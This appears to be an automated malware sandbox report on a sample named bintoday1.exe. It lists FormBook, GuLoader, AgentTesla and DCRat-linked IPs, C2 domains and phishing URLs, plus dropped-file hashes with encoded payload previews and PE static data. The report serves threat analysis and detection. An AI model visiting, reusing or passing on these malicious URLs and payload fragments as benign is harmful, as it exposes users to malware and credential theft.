198.57.245.28	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.limonchimneysweep.shop/xazv/
91.184.0.200	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	www.synthtv.online/h2pg/
	P240842_P240843.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.durkal.online/ht3d/?LjqdxdN0=wyJlkAZPRef/xyPbhfrWrGGI/Xeqxm4pcr0IjHYue8o6lYTmszTOgufsq9uZLmD6QeIH&_Td4vT=ZL3P5PGPdr
	SOgv6zN9CC.exe	Get hash	malicious	FormBook, PureLog Stealer, XWorm	Browse	www.vacaturecast.com/s8i3/
	Search.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.vacaturecast.com/s8i3/
	N270-10-MR-1671-01.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.vacaturecast.com/e25x/?tRA0=bRYFyNPHUR9ZyeaHmFwmf49ijjXARrBtW8m368i6MuarCPo5JtbUrZkyRXYxENSXPr16BZRjG7PBGgLNgPW/q8cExkQ7GhQ5fPxnvfcm7LwhxlM0Bg==&yxB=0VxDV8
	OYT57DouoW.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.opleverdossier.online/fefu/?ut=sfpX1rF&-p_T=2HxXhp6QmohqCJBshWmgSNg9x/ibEwSR/tQSoJ1LoCP1IXTV2bQKKoyCI2q4v+/rVijuq9OOUtTkT8Si7gxdULAzxHQLxPN1XA==
	hesaphareketi-01.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.opleverdossier.online/ac9t/?wT7P=ortKUPIYDTZz308H4AXD9FcNop0Av0FsXz8OWEyG+gd1ubdEkKAJJPw7WNlNdF7EHP+W+XAGNDVTlNZggQfdA9HPAfi/u/XPfA==&Ahm=OJYxThc8VTyL_TWP
	Antndte.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.opleverdossier.online/3hr5/?TZd=Ev/i97Tm7R4lDQvwRTbCpMnzZ5SeBkReZZSk+dIP2ayGgCnfpc6J5LuxSZ4Sg1Tim62dxJKo6oeqNUab7HWhjplzx5YkH5PNCw==&gpo=NNNtyBQpfR9tJN1
	Technical_Offer.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.opleverdossier.online/fefu/?1XjpS=4bALnjbxgpP&lnw8IrK=2HxXhp6QmohqCJBttmmlSNo/3uybQwSR/tQSoJ1LoCP1IXTV2bQKKoyCI2q4v+/rVijuq9OOUtTkT8Si7gxdTKAu/ngDwZFxRw==
	ORS51123MQ90EI.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.opleverdossier.online/plo0/?V0jtHFpx=fkqMe95ujLWWMcxElDUcuug/hUauz19UpYayudMxP+SdPModxxWXM00gb4P/Eq2VpMTyLnoGTxZOEs1yHQ9aoLfge+tLpMwOYg==&HD=_X4DLBh8KBc

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.dom-2.online	factura-630.900.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	PAGO $630.900.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.226
	Debit note Jan-Jul 2024.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	TRIAL_ORDER_OTHERS.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.226

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://my.manychat.com/r?act=179c825ab8add5f9e8bacb82e520a126&u=7459244230843026&p=108345799024755&h=708b8c96be&fbclid=IwZXh0bgNhZW0CMTAAAR07FD8Q65AMa77uMdYFT9FANMjTbvHV0BrVDR-o7WBQKwVAUtHYk2rnVVU_aem_OFd7GNUGsZzyslAWr711gg	Get hash	malicious	Unknown	Browse	18.185.191.84
	https://tinyurl.com/NDCEurope	Get hash	malicious	Unknown	Browse	18.239.83.58
	SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msi	Get hash	malicious	AteraAgent	Browse	18.239.36.2
	OJO!!! No lo he abiertoFwd_ Message From 646___xbx2.eml	Get hash	malicious	Unknown	Browse	52.50.50.234
	http://rebrand.ly	Get hash	malicious	Unknown	Browse	52.217.120.128
	quotation.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	13.248.169.48
	https://iam.ngscout.org/account/resetpassword?id=d05ffe24-cb73-4f03-bf4f-9e9ff83127f7&code=cc2ff9ab-5352-4ab7-90d6-7459bc6ea5db	Get hash	malicious	Unknown	Browse	54.177.56.198
	https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E	Get hash	malicious	Unknown	Browse	3.160.150.40
	https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E	Get hash	malicious	Unknown	Browse	3.160.150.31
ARUBA-ASNIT	Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exe	Get hash	malicious	AgentTesla	Browse	62.149.156.218
	BUKHuBek8M.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	https://urlsand.esvalabs.com/?u=https%3A%2F%2Flinkin.bio%2Falbatros&e=606d87ee&h=dea68a16&f=y&p=y	Get hash	malicious	HTMLPhisher	Browse	95.110.136.136
	foIdlOzWvH.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	3O5Uh9S6wK.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	trkfmve.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	bfderfg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	iolZQ9869U.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	8mBGM9uk53.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	jZrY9owO7A.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
UNIFIEDLAYER-AS-1US	Document_pdf.exe	Get hash	malicious	FormBook	Browse	162.240.81.18
	https://thb.oui.mybluehost.me/Betalingsservice/betal	Get hash	malicious	Unknown	Browse	162.241.217.174
	Hua San Particulars.doc.scr.exe	Get hash	malicious	AgentTesla	Browse	50.87.144.157
	BULK HARVEST - VESSEL PARTICULARS.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	50.87.144.157
	Catalina - Particulars.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	50.87.144.157
	rRFQ.bat.exe	Get hash	malicious	FormBook	Browse	162.241.226.190
	http://pxe.wvs.mybluehost.me/wise/number-account-854630/pages/login.php	Get hash	malicious	Unknown	Browse	50.87.253.221
	28082024.html	Get hash	malicious	HTMLPhisher	Browse	69.49.245.172
	https://shorturl.at/1l4Xw	Get hash	malicious	HTMLPhisher	Browse	69.49.230.198
	https://assets-usa.mkt.dynamics.com/c9f731e3-0864-ef11-a66d-6045bd003021/digitalassets/standaloneforms/0424cf3e-7364-ef11-bfe2-6045bd055762	Get hash	malicious	HTMLPhisher	Browse	162.241.61.243

Process:	C:\Windows\SysWOW64\compact.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Dalis

Download File

Process:	C:\Users\user\Desktop\bintoday1.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	86022
Entropy (8bit):	4.178726225711481
Encrypted:	false
SSDEEP:	1536:G76Pa2yrocJoOHKhoNokUiz4HH1nSkauD2grpVFSzN7Qwm:u6iQAREXe6V/2wVoh7Qwm
MD5:	D6EB090D8738420A1264161CBF1D6CFF
SHA1:	5AD0D9DB982924BE96797CEF793CB137A8E4FF6A
SHA-256:	9F7B54B9428510C53A310978331C02287A6D4193160184923BEA37F97A6ED987
SHA-512:	20753F5AFC399601FFBE45A6322AE115932B9C661CCF949DC137DE2394B2D6C7BBBB12B540CF0FAC0914268874BA95DCE1E69579B5AA674798355FDE4029A03C
Malicious:	false
Reputation:	low
Preview:	30G78D35F35L38Q62X65Z63L38R31P65O63J63E63N30N32X30U30W30J30G35V36J35V37Z62M38A36U62O30B30B30B30D30E30U36T36D38Z39R34Q35H38I34H62O39G36K35V30N30T30G30E30C30A36P36N38B39M34H64I38Y36D62V61F37X32E30U30P30W30C30U30Y36U36M38S39Z35Y35Q38D38C62T38Y36V65B30F30A30R30D30E30T36P36Y38A39V34C35R38H61G62K39O36U35W30V30U30T30D30A30D36U36M38Q39M34X64H38W63F62O61D36O63D30X30H30J30B30P30O36H36C38J39E35F35E38I65H62J38U33L33M30Y30Y30P30X30W30O36Z36O38P39K34D35R39A30N62Y39C33K32D30C30Y30D30G30C30I36T36W38L39G34P64G39H32I62N61K32A65K30T30S30Q30W30X30M36M36E38J39V35I35S39X34N62R38E36F34U30M30M30H30Z30B30C36C36W38W39Y34Z35J39R36K62J39B36I63U30T30A30J30N30Q30I36E36I38E39X34F64K39R38Y62J61Y36A63K30H30S30Y30N30B30I36Z36G38V39B35H35P39Y61E33X33W63B30A36H36I38U39Q34O35J39A63C62K39Q36B65K30F30K30S30F30F30T36C36P38F39D38I64I34E34B66K66R66A66O66K66F62W61S37Z34R30L30F30N30Z30V30T36R36T38E39R39C35M34I36M66K66M66O66I66L66V62Q38K36R34Q30U30J30L30C30W30P36V36D38T39F38D35L34C38Q66X66Y66E66N66H66A62U39A36P63N30E30C30G30P30U3

C:\Users\user\AppData\Local\Temp\aut76CA.tmp

Download File

Process:	C:\Users\user\Desktop\bintoday1.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.9931862068230455
Encrypted:	true
SSDEEP:	6144:vR3m7nmz7SpqyeoMmiEy1o4uLLMYjrVkI8H63fqfmmlTtLgWRXT0qQ:vtm7nBp0lmiH1nuxFkHa3fq+mNtDQ
MD5:	24306E310EBE3CB3B24C62A0277D5992
SHA1:	B07EAC799C153090988C1E8C9CE8D6E5F0DD796D
SHA-256:	0DE9583F8CB98F6FCFAB17424FB16DA23F8FCD65EDBB19BE150A21F3E5A7FE97
SHA-512:	CFB57FE82B0233815D224F3DE711397A3CC0953D3B41B61BBCF26508651EF7B6B934742E8235D71649A985EAB60022763897E959AA14759E7307E2E9305B175F
Malicious:	false
Reputation:	low
Preview:	zl.j.LJIG..L......LI..q[M..D82LJIGDYXED76D82LJIGDYXED76D8.LJII[.VE.>.e.3..h.,0+e4EY#JS!j&771dUSdJG"j )d...dZY ].AGCcDYXED76=9;.w) .d8"..V#.(..}$>._..xXU.P..e8".e_'P.,-.GDYXED76.}2L.HFD.q;%76D82LJI.D[YNE<6D`6LJIGDYXEDg$D82\JIG4]XEDw6D(2LJKGD_XED76D84LJIGDYXE436D:2LJIGD[X..76T82\JIGDIXET76D82LZIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXk0RN082L..CDYHED7n@82\JIGDYXED76D82LjIG$YXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82L

C:\Users\user\AppData\Local\Temp\aut7709.tmp

Download File

Process:	C:\Users\user\Desktop\bintoday1.exe
File Type:	data
Category:	dropped
Size (bytes):	43568
Entropy (8bit):	7.825491085931825
Encrypted:	false
SSDEEP:	768:aO4Lehr3/KB62ctu9p8xeVIzUleO+fxPoyvORFAI2arLdyGU:aFaSBMs/qJ0eOSxPoyvO/AHa3ddU
MD5:	347320DF2C60168D6175C35F34FC5CCD
SHA1:	560F5C577DCC7DC136C5F670E95B1EEFB48A4628
SHA-256:	B59EE27EA0DCE24E312AA70A9836CE63AE9DA2B5C9B998780D20ECA5C533C635
SHA-512:	B530B144571053BC5A253F990B99277CA39D2A80B7FF5335A0F4A3F25D2F025F6CEF10ABCC5190786DBBDF472E42E68A6DED9F7A6ACD0F42D578E5F7CF324F1E
Malicious:	false
Preview:	EA06..P...(.y..g5.L...6.V&.Z..f..T.s...kO.L.Si..m3.L....3.Ufs...aJ.9&sZ..mJ..f....3.Pfsj..eO..(@.z.L..P.6mT...9.jg9.L....3.RfsJ@.k9.....T...U....6.3..'....3.P.s.h.k4.......m2.M.4i..3........C....@...4...5...3..f`.$.6.U....j.2Q....H..U@.....j.9..g5.L.....6.R.s.x..5.c..uP...?(.....QU....`..t`..m1...O.......T ...8.L..9..3..@^.(.q6.......3.}&t.........p.j...L.....3...).....M.U...3...s .-Y......$........iP.M(.9."g2..T.........3.T@.`.......UZg5...).bg4.l.E.,.mF...B.h....V.6........s...h..... ...a..sjL.f.}...uN.r.(....h..1.i.....f+ ...b.`Pf..`.3S.....$.:....`...<.......3..&s0.2...R.....sQ..)....qC..39......)`.......cU...3.....'fiE..(S`..mR..H.:..b..U......3..$.......U.. .......J@...nS@.h.-I.M..`).d.FR...1.....'T0...\...UI.......T..Y6.M....6.S..j@..2....:....p$8.P..$T..(.P.M.....m1.<(@.......lU.......u......T.7.....US@l.(....U...........`...6.....&J...V.~.(...PP.6$.r.....,.Vm5...@.Eh.....l..@.(...@.....K) -........VE6m4.........5T.&j...2..l@Q...

C:\Users\user\AppData\Local\Temp\croc

Download File

Process:	C:\Users\user\Desktop\bintoday1.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.9931862068230455
Encrypted:	true
SSDEEP:	6144:vR3m7nmz7SpqyeoMmiEy1o4uLLMYjrVkI8H63fqfmmlTtLgWRXT0qQ:vtm7nBp0lmiH1nuxFkHa3fq+mNtDQ
MD5:	24306E310EBE3CB3B24C62A0277D5992
SHA1:	B07EAC799C153090988C1E8C9CE8D6E5F0DD796D
SHA-256:	0DE9583F8CB98F6FCFAB17424FB16DA23F8FCD65EDBB19BE150A21F3E5A7FE97
SHA-512:	CFB57FE82B0233815D224F3DE711397A3CC0953D3B41B61BBCF26508651EF7B6B934742E8235D71649A985EAB60022763897E959AA14759E7307E2E9305B175F
Malicious:	false
Preview:	zl.j.LJIG..L......LI..q[M..D82LJIGDYXED76D82LJIGDYXED76D8.LJII[.VE.>.e.3..h.,0+e4EY#JS!j&771dUSdJG"j )d...dZY ].AGCcDYXED76=9;.w) .d8"..V#.(..}$>._..xXU.P..e8".e_'P.,-.GDYXED76.}2L.HFD.q;%76D82LJI.D[YNE<6D`6LJIGDYXEDg$D82\JIG4]XEDw6D(2LJKGD_XED76D84LJIGDYXE436D:2LJIGD[X..76T82\JIGDIXET76D82LZIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXk0RN082L..CDYHED7n@82\JIGDYXED76D82LjIG$YXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82LJIGDYXED76D82L

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.160791224205036
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bintoday1.exe
File size:	1'274'880 bytes
MD5:	99d47f7fc3f035df01dc336375353e29
SHA1:	170df6ec2df3ad5406669aec1a3143ea96e9294d
SHA256:	69bdeb6d07e36540afe4f1084317c2dad449874becb4476c40e385ce06840a8e
SHA512:	62a0be5ce569403f2cea880832e3add6c0ae3f751e21225b2aca45f9493bfcc430b47fd70cb99c1085d8dbf2b83c4a1262eef592faec6a0be2c65f4b51a09f0f
SSDEEP:	24576:JqDEvCTbMWu7rQYlBQcBiT6rprG8awjHhy0Zqr59mActfopS2g:JTvC/MTQYxsWR7aw7hzZA9/co
TLSH:	9745C00273D1C062FF9BA2334B5AF7115BBC69660123A61F13A81D79BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66C343AB [Mon Aug 19 13:07:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F744904F003h
jmp 00007F744904E90Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F744904EAEDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F744904EABAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F74490516ADh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F74490516F8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F74490516E1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x608a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x135000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x608a0	0x60a00	54f02f26c20da5386edb709cce0e688c	False	0.9317189521345407	data	7.903472320771076	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x135000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x57b66	data			1.0003228769449162
RT_GROUP_ICON	0x134320	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x134398	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1343ac	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1343c0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1343d4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1344b0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, 